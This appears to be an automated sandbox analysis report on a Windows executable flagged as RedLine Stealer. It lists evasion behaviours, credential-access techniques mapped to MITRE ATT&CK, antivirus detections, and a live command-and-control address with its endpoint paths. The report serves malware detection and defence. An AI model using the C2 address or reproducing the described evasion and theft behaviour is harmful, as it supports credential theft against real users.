                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe TID: 2120Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe TID: 3216Thread sleep count: 77 > 30
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe TID: 3216Thread sleep time: -77000s >= -30000s
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeMemory allocated: page read and write | page guard
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess created: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468601055.0000000001600000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468601055.0000000001600000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468601055.0000000001600000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468601055.0000000001600000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected RedLine StealerShow sources
                Source: Yara matchFile source: 1.2.7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.393a170.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.393a170.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe PID: 968, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe PID: 992, type: MEMORYSTR

                Remote Access Functionality:

                barindex
                Yara detected RedLine StealerShow sources
                Source: Yara matchFile source: 1.2.7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.393a170.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.393a170.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe PID: 968, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe PID: 992, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Masquerading1OS Credential DumpingProcess Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerSystem Information Discovery12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing2Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe39%VirustotalBrowse
                7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                2.2.7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.400000.0.unpack100%AviraHEUR/AGEN.1142322Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy0%Avira URL Cloudsafe
                http://ocsp.sectigo.com00%URL Reputationsafe
                http://tempuri.org/Endpoint/GetArguments0%VirustotalBrowse
                http://tempuri.org/Endpoint/GetArguments0%Avira URL Cloudsafe
                https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                http://tempuri.org/2%VirustotalBrowse
                http://tempuri.org/0%Avira URL Cloudsafe
                http://45.137.155.31:115560%VirustotalBrowse
                http://45.137.155.31:115560%Avira URL Cloudsafe
                http://tempuri.org/Endpoint/VerifyUpdateResponse$0%Avira URL Cloudsafe
                http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                http://tempuri.org/Endpoint/VerifyScanRequest0%Avira URL Cloudsafe
                http://tempuri.org/Endpoint/GetUpdatesResponse$0%Avira URL Cloudsafe
                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                http://tempuri.org/Endpoint/GetArgumentsResponse$0%Avira URL Cloudsafe
                https://sectigo.com/CPS0D0%URL Reputationsafe
                http://tempuri.org/Endpoint/0%Avira URL Cloudsafe
                http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                http://45.137.155.31:1155640%Avira URL Cloudsafe
                http://tempuri.org/00%Avira URL Cloudsafe
                http://45.137.155.31:11556/0%Avira URL Cloudsafe
                http://tempuri.org/Endpoint/VerifyScanRequestResponse$0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://45.137.155.31:11556/true
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://ipinfo.io/ip%appdata%7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmpfalse
                  high
                  https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.sectigo.com07C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exefalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/Endpoint/GetArguments7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469171035.0000000002C62000.00000004.00000001.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468837509.0000000002BC1000.00000004.00000001.sdmpfalse
                    high
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/soap/envelope/7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469171035.0000000002C62000.00000004.00000001.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/soap/envelope/D7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469171035.0000000002C62000.00000004.00000001.sdmpfalse
                        high
                        http://tempuri.org/7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469143603.0000000002C5A000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469171035.0000000002C62000.00000004.00000001.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://45.137.155.31:115567C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469171035.0000000002C62000.00000004.00000001.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://tempuri.org/Endpoint/VerifyUpdateResponse$7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://tempuri.org/Endpoint/GetUpdates7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exefalse
                        • URL Reputation: safe
                        unknown
                        https://api.ipify.org7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2004/08/addressing7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468837509.0000000002BC1000.00000004.00000001.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/fault7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468837509.0000000002BC1000.00000004.00000001.sdmpfalse
                              high
                              http://tempuri.org/Endpoint/VerifyScanRequest7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://tempuri.org/Endpoint/GetUpdatesResponse$7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exefalse
                              • URL Reputation: safe
                              unknown
                              http://tempuri.org/Endpoint/GetArgumentsResponse$7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://sectigo.com/CPS0D7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exefalse
                              • URL Reputation: safe
                              unknown
                              http://tempuri.org/Endpoint/7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://tempuri.org/Endpoint/VerifyUpdate7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://45.137.155.31:1155647C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://tempuri.org/07C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469143603.0000000002C5A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/soap/actor/next7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468837509.0000000002BC1000.00000004.00000001.sdmpfalse
                                  high
                                  http://tempuri.org/Endpoint/VerifyScanRequestResponse$7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown

                                  Contacted IPs
